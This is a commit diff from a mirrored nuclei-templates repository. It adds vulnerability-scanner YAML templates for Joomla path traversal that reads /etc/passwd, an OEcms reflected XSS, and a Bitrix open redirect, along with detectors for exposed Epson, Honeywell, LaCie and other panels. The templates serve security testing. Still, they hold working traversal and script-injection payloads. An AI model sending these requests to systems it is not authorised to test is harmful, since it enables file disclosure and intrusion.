daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

patch-1
socketz 2021-08-25 14:33:32 +02:00
parent ddd3ef8493 c27048b77f
commit ed76585ed6
13 changed files with 269 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
cves/2010/CVE-2010-1306.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1306
info:
name: Joomla! Component Picasa 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12058
- https://www.cvedetails.com/cve/CVE-2010-1306
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1954.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1954
info:
name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12287
- https://www.cvedetails.com/cve/CVE-2010-1954
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

33
cves/2018/CVE-2018-12095.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2018-12095
info:
name: OEcms 3.1 - Cross-Site Scripting
author: LogicalHunter
severity: medium
description: A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php.
reference:
- https://www.exploit-db.com/exploits/44895
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095
- https://cxsecurity.com/issue/WLB-2018060092
tags: cve,cve2018,xss
requests:
- method: GET
path:
- '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

2
cves/2019/CVE-2019-15501.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2019-15501
info:
name: LSoft ListServ - XSS
author: Borna Nematzadeh
author: LogicalHunter
severity: medium
reference:
- https://www.exploit-db.com/exploits/47302

2
cves/2019/CVE-2019-8937.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2019-8937
info:
name: HotelDruid 2.3.0 - XSS
author: Borna Nematzadeh
author: LogicalHunter
severity: medium
refrense: https://www.exploit-db.com/exploits/46429
tags: cve,cve2019,xss,hoteldruid

32
exposed-panels/epson-unauthorized-access-detect.yaml Normal file
View File

@ -0,0 +1,32 @@
id: epson-unauthorized-access-detect
info:
name: Epson Printer
author: pussycat0x
severity: medium
reference: https://www.exploit-db.com/ghdb/6922
tags: iot,printer,panel,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/PRESENTATION/EPSONCONNECT"
matchers-condition: and
matchers:
- type: word
words:
- "Epson Connect"
- "/IMAGE/EPSONLOGO.PNG"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "<title>([A-Z-0-9]+) Series</title>"

25
exposed-panels/epson-web-control-detect.yaml Normal file
View File

@ -0,0 +1,25 @@
id: epson-web-control-detect
info:
name: Epson Printer
author: pussycat0x
severity: info
reference: https://www.exploit-db.com/ghdb/6873
tags: iot,printer,panel,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/home"
matchers-condition: and
matchers:
- type: word
words:
- "Epson Web Control"
- "Basic Control"
- "Advanced"
condition: and
- type: status
status:
- 200

23
exposed-panels/honeywell-web-controller.yaml Normal file
View File

@ -0,0 +1,23 @@
id: honeywell-web-controller
info:
name: Honeywell XL Web Controller
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7130
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}/standard/default.php'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Honeywell XL Web Controller</title>'
- type: status
status:
- 200

23
exposed-panels/ibm-note-login.yaml Normal file
View File

@ -0,0 +1,23 @@
id: ibm-note-login
info:
name: IBM iNotes Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7122
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/names.nsf'
matchers-condition: and
matchers:
- type: word
words:
- '<title>IBM iNotes Login</title>'
- type: status
status:
- 200

31
exposed-panels/lacie-panel.yaml Normal file
View File

@ -0,0 +1,31 @@
id: lacie-panel
info:
name: LaCie Login Panel
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7118
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/dashboard/'
matchers-condition: and
matchers:
- type: word
words:
- 'id_LaCie'
part: body
- type: regex
regex:
- '(?m)<title>([a-zA-Z0-9&#; ]|)+Dashboard<\/title>$'
part: body
- type: status
status:
- 200

22
exposed-panels/web-service-panel.yaml Normal file
View File

@ -0,0 +1,22 @@
id: web-service-panel
info:
name: WEB SERVICE Panel
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7116
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>WEB SERVICE</title>'
- type: status
status:
- 200

23
technologies/synology-web-station.yaml Normal file
View File

@ -0,0 +1,23 @@
id: synology-web-station
info:
name: Synology Web Station
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7125
tags: tech
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Hello! Welcome to Synology Web Station!</title>'
- type: status
status:
- 200

2
vulnerabilities/other/bitrix-open-redirect.yaml
View File

@ -21,7 +21,7 @@ requests:
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com'
- '{{BaseURL}}bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
matchers-condition: and